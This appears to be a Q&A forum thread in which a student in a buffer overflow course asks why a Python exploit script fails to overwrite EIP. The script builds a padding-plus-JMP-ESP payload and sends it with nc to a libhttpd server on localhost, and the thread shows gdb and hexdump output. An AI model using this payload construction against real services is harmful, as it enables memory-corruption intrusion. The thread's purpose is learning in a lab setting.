# How can I fix this code to overwrite the EIP properly in Python?

Tags: python, buffer-overflow, eip

I am following a buffer overflow course, trying to overwrite the EIP using Python. The example script is as follows:

```
import os, sys

#JMP_ESP = 0x804cc6f
JMP_ESP = "\x6f\xcc\x04\x08"

w = open('./payload.txt', "w")
write = "POST "
write += "A"*1048 + JMP_ESP + "C"*(1400-1048-4)
w.write(write)
w.close()

os.system('echo $(cat payload.txt) | nc -nv 127.0.0.1 8080')
```

This dumps the string to payload.txt which we then send to the server using echo + nc. However, when you use "cat" on the payload.txt file you just get As + o + Cs, like this:

```
...AAAAAoCCCCCCC...(omitted)
```

If I open the file in vi I see this:

```
...AAAAoÃŒ^D^HCCCC...(omitted)
```

From gdb, this is what I see on in the EIP:

```
EDI: 0x8048c70 (<_start>:       xor    ebp,ebp)
EBP: 0x41414141 ('AAAA')
ESP: 0xffffd5b0 ('C' <repeats 200 times>...)
EIP: 0xffffd70c --> 0x0
```

If I change it to "cat -v" I get this:

```
EDI: 0x8048c70 (<_start>:       xor    ebp,ebp)
EBP: 0x41414141 ('AAAA')
ESP: 0xffffd5b0 ("^D^H", 'C' <repeats 196 times>...)
EIP: 0x4c2d4d6f ('oM-L')
```

Is there some special thing I need to do to when writing the file, opening it or creating the string to get this to work?

Comment: Have you done a hexdump on the file?  Do you understand that \xff and \x08 and \x04 do not have ASCII representations and will not display via 'cat'?  "vim" is showing you that your file has what you expect:  6f is the letter "o", and 04 08 are "^D^H"..  I'm not sure you're quite ready for a course of this depth.

Comment: What are you trying to exploit here?  nc?

Comment: Yeah, I am probably not ready but I am learning, and the concepts of the course are good, I may just skip this module for now. We are trying to exploit a module called libhttpd running on port 8080 of the localhost. I do understand these don't have ASCII representations so have been researching other ways to get this done, not sure why the instructors demo worked. The hex dump of the "problem" parts of the file are, where 41 = A and 43 = C.  


`0000410 4141 4141 4141 4141 4141 4141 6f41 8cc3
0000420 0804 4343 4343 4343 4343 4343 4343 4343`  


Appreciate the reply.